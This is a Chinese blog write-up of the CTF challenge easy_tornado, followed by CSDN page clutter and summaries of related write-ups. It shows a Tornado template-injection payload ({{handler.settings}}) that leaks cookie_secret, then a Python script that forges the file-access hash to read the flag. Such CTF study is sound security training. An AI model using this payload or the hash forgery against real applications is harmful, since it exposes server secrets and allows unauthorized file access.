[护网杯 2018]easy_tornado

最新推荐文章于 2024-03-29 12:54:37 发布
最新推荐文章于 2024-03-29 12:54:37 发布
阅读量190 收藏 1
点赞数
分类专栏: Buu-Web 文章标签: tornado CTF 网络安全 WriteUp web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/129851693
版权

[护网杯 2018]easy_tornado

进入靶场:
在这里插入图片描述

  • 首页上三个链接,挨个去查看下。
    在这里插入图片描述


在这里插入图片描述

  • 链接格式都是:/file?filename=/hints.txt&filehash=xxxxxxx
  • flag in /fllllllllllllag:猜测flag在文件/fllllllllllllag
  • filename hash要用md5(cookie_secret+md5(filename))的格式加密
  • 接下来的问题就是filename有了,剩下cookie_secretcookie_secret是tornado框架里面的。

fuzz后面的参数:

发现存在msg参数可以进行模板注入:
在这里插入图片描述

  • tornado在搭建一个网站时,肯定会有多个handler,而这些handler都是RequestHandler的子类

  • RequestHandler.settings又指向self.application.settings

  • 这样我们就可以构造一下payload:?msg={{handler.settings}}
    在这里插入图片描述

  • 拿到cookie_secret就可以写个小脚本去算md5值了

import sys
import hashlib

cookie = "d9378b20-58de-430d-afce-313282095a39"
filename = "/fllllllllllllag"

md5 = hashlib.md5()
md5.update(filename.encode('utf-8'))
finename_md5 = md5.hexdigest()

flag = cookie + finename_md5
md5 = hashlib.md5()
md5.update(flag.encode('utf-8'))
flag_md5 = md5.hexdigest()
print(flag_md5)

在这里插入图片描述

Get Flag ! ! !

m0sway
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[护网 2018]easy_tornado(SSTI服务器端模板注入)
weixin_45253573的博客
11-12 637
tornado Tornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。 可以考虑服务器端模板注入 参考SSTI完全学习 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty
[护网 2018]easy_tornado WriteUp(超级详细!)
lunan的博客
04-22 3209
[护网 2018]easy_tornado   打开题目后,首先发现3个超链接   依次点开三个链接    网址里有参数filename和filehash推测这里flag应该是 filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))里面,filehash里hash就是提示为md5的hash加密。    变量 filename 的值总是为要访问的文件,再根据提示三和 fil
护网 2018easy_tornado
Lixunzhe0112的博客
01-17 528
常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞。错误的执行了用户输入。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2mako tornado django,php的smarty twig,java的jadevelocity。
[护网 2018]easy_tornado(wp)
最新发布
wikey 的博客
03-29 883
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。除此之外,在Twig模板引擎里,,{{var}} 除了可以输出传递的变量以外,还能执行一些基本的表达式然后将其结果作为该模板变量的值。msg={{1}},输出1,可以确定是模板注入。render渲染函数。
[护网 2018]easy_tornado 1(两种解法!)
m0_73734159的博客
11-12 1672
tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量。猜测解题关键点在md5(cookie_secret+md5(filename))这里。改哈希值看看是否有变化。
buuojweb刷题wp详解及知识整理—-【护网easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
2018护网逆向题目
10-16
2018护网的3道逆向题目.
2020全国工业互联网安全技术技能大赛-护网-chinaiisc2020.zip
10-24
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
网鼎writeup-护网先锋1
08-04
3、得到 flag,截图如下图所示: 1、查看源代码可以发现存在代码泄露,代码如下: 2、在 get 中使用.可以绕过第一个判断 3、使用.@c7f.zhuqu
2020全国工业互联网安全技术技能大赛-护网原题及附件-chinaiisc2020
01-11
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
[护网 2018]easy_tornado 解析
qq_73722777的博客
10-09 289
tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量。打开网页有三个链接,依次点开之后获得一个fllllllllllllag一个render和一个MD5加密格式。
[护网 2018]easy_tornado 1
weixin_45674567的博客
06-01 2857
点击/flag.txt,说明flag在 /fllllllllllllag 里。 点击/welcome.txt,render()函数是渲染函数,进行服务器端渲染。 点击/hints.txt,出现: reader()函数联想到模板注入:±*/等符号,都被过滤,^没被过滤,成功回显 根据: 搜素百度得Tornado框架的附属文件handler.settings中存在cookie_secret 尝试:error?msg={{handler.settings}} 得到 结合之前访问/flag.txt、/we..
2018护网第一场 web easy tornado LTshop超详细解答
iamsongyu的博客
10-24 4834
easy tornado 这个tornado是一个python的模板,在web使用的时候给出了四个文件,可以访问,从提示中和url中可以看出,访问需要文件名+文件签名(长度为32位,计算方式为md5(cookie_secret + md5(filename)));  flag文件名题目已给出 /fllllllllllag         题目关键为如何获取cookie,在Bp抓包的情况下没有显...
2018护网easy_tornado(BUUCTF提供复现)
Sea_Sand息禅
09-26 4824
进入页面: 然后依次看一下: 1)/flag.txt 网页内容: /flag.txt flag in /fllllllllllllag url: file?filename=/flag.txt&filehash=9f1a5c8c40be3aafbc5e719d151b1d36 这个页面告诉我们,flag在/fllllllllllllag文件中 2)/welcome.txt 网页内容: ...
BUUCT-WEB-easy_tornado
迷风小白
07-02 7530
easy_tornado tornado是python中的一个web应用框架。 拿到题目发现有三个文件 flag.txt /flag.txt flag in /fllllllllllllag 发现flag在/fllllllllllllag文件里 welcome.txt /welcome.txt render render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值